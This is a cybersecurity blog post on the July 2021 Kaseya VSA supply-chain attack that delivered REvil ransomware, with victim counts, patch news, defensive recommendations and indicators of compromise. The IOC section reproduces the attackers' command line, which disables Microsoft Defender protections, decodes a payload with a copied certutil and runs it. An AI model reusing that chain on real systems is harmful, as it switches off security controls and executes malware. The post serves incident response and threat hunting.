Table of Contents
July 6, 2021
|5m
1000 Business Worldwide Were Hit By Kaseya Supply-Chain Attack With REvil Ransomware
Researchers have discovered that the Russia-linked REvil ransomware gang first targets the Florida-based IT company “Kaseya” and then spread through corporate networks that use its software. According to researchers, more than 1000 business were hit by Kaseya supply-chain attack until now.
The company’s CEO Fred Voccola quoted, “Beginning around mid-day (EST/US) on Friday, July 2, 2021, Kaseya’s Incident Response team learned of a potential security incident involving our VSA software”. In a statement shared late Friday. In response to the attack, The company has shut down its SaaS servers as a precautionary measure. In addition to that, the company notified their customers to shut down their on-premises VSA servers to prevent them from being compromised.
Update: Now, almost ten days later, on 11th July, Kaseys has released a patch for VSA supply-chain attack. The Florida-based software company has fixed three new security vulnerabilities in the released patch to address critical security issues in its Virtual System Administrator (VSA) solution. With this update, the company has fixed a total of seven vulnerabilities, including the three new vulnerabilities. Let’s see the changes Kaseya has made in the VSA release 9.5.7a.
Voccola also said that it had identified the source of the Kaseya supply-chain attack. And it is creating a patch to mitigate the ongoing issues.
Mark Loman, a Malware Analyst from Sophos Tweated, The Kaseya supply-chain attack seems to stem from a malicious Kaseya update. According to him, the attack used Kaseya VSA to deploy a variant of the REvil ransomware into a victim’s environment. He also added that the supply-chain attack attempts to disable Microsoft Defender Real-Time Monitoring via PowerShell.
Picture #1: A tweet from Mark Loman,on Kaseya supply-chain attack
Victims Of Kaseya Supply-Chain Attack:
Initially, Researchers from Huntress Labs found eight managed service providers (MSPs) had been hit by the attack. About 200 businesses that took the IT services from those eight MSPs have been locked out of parts of their network. Recent studies from the Dutch Institute for Vulnerability Disclosure (DIVD) show that REvil ransomware might have used a number of zero-day vulnerabilities in its VSA software (CVE-2021-30116) to exploit and deploy the ransomware. DIVD also said that these zero-days are trivial to exploit, and about 1000 businesses from more than 17 countries, including the U.K., South Africa, Canada, Argentina, Mexico, Indonesia, New Zealand, and Kenya, were affected by the attack.
Picture #2: Kaseya Supply-Chain Attack stats from DIVD
Current Updates Of Kaseya Supply-Chain Attack:
We recommend visiting these two pages regularly to have updated information about the Kaseya supply-chain attack.
Updates from Huntress Incident Response team: https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident
Latest updates from Kaseya: https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-2nd-2021
What To Do If You Are Hit by Kaseya supply-chain Attack?
Recommendations for all:
It is recommended that all on-premise VSA servers should continue to remain down until further instructions.
Block all the IOC on your routers, firewalls, web proxies, and EDRs.
Monitor your IT infrastructure 24×7 for malicious activities.
Perform Threat Hunting to uncover suspicious activities
Recommendations for MSPs:
download the Compromise Detection Tool developed by Kaseya to Identify the IOCs.
Identify the IOCs
Enable multifactor authentication
Limit communication with (RMM) remote monitoring and management capabilities to known IP address pairs
Place the administrative interfaces of RMM behind a VPN or a firewall
Recommendations for MSP’s customers:
Please keep all the backups up to date and stored them in an easily retrievable location to initiate the restoration process whenever you require to restore the services from the backups
Use the manual patching process to install the patches. Test the patches on the lower environment before applying to production
Enable multifactor authentication
Indicators Of Compromise (IOCs):
Sophos Detections
Troj/Ransom-GIP
Troj/Ransom-GIQ
HPmal/Sodino-A
Detected in C:\Windows\MsMpEng.exe
DynamicShellcode
hmpa.exploit.prevented.1
Cryptoguard
cryptoguard.file.detected.1
Process Data:
“C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 6258 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Parent Path – C:\Program Files (x86)\Kaseya\<ID>\AgentMon.exe
“C:\Windows\system32\cmd.exe” /c ping 127.0.0.1 -n 5693 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Parent Path – C:\Program Files (x86)\Kaseya\<ID>\AgentMon.exe
Files Involved
C:\windows\cert.exe
36a71c6ac77db619e18f701be47d79306459ff1550b0c92da47b8c46e2ec0752
C:\windows\msmpeng.exe
33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a
C:\kworking\agent.crt
C:\Windows\mpsvc.dll
8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
C:\kworking\agent.exe
d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
Registry Keys:
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\BlackLivesMatter
Ransomware Extension:
<victim ID>-readme.txt
File Hashes:
36a71c6ac77db619e18f701be47d79306459ff1550b0c92da47b8c46e2ec075233bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a
Domains
ncuccr[.]org
1team[.]es
4net[.]guru
35-40konkatsu[.]net
123vrachi[.]ru
4youbeautysalon[.]com
12starhd[.]online
101gowrie[.]com
8449nohate[.]org
1kbk[.]com[.]ua
365questions[.]org
321play[.]com[.]hk
candyhouseusa[.]com
andersongilmour[.]co[.]uk
facettenreich27[.]de
blgr[.]be
fannmedias[.]com
southeasternacademyofprosthodontics[.]org
filmstreamingvfcomplet[.]be
smartypractice[.]com
tanzschule-kieber[.]de
iqbalscientific[.]com
pasvenska[.]se
cursosgratuitosnainternet[.]com
bierensgebakkramen[.]nl
c2e-poitiers[.]com
gonzalezfornes[.]es
tonelektro[.]nl
milestoneshows[.]com
blossombeyond50[.]com
thomasvicino[.]com
kaotikkustomz[.]com
mindpackstudios[.]com
faroairporttransfers[.]net
daklesa[.]de
bxdf[.]info
simoneblum[.]de
gmto[.]fr
cerebralforce[.]net
myhostcloud[.]com
fotoscondron[.]com
sw1m[.]ru
homng[.]net
Thanks for reading this threat post. We believe it’s our duty to share information about the threats to create awareness and secure the digital world.
Arun KL
Arun KL is a cybersecurity professional with 15+ years of experience in IT infrastructure, cloud security, vulnerability management, Penetration Testing, security operations, and incident response. He is adept at designing and implementing robust security solutions to safeguard systems and data. Arun holds multiple industry certifications including CCNA, CCNA Security, RHCE, CEH, and AWS Security.
- April 18, 2024
Learn Something New with Free Email subscription
Learn Something New with Free Email subscription
Subscribe
Subscribe
Subscribe
Subscribe
- April 18, 2024
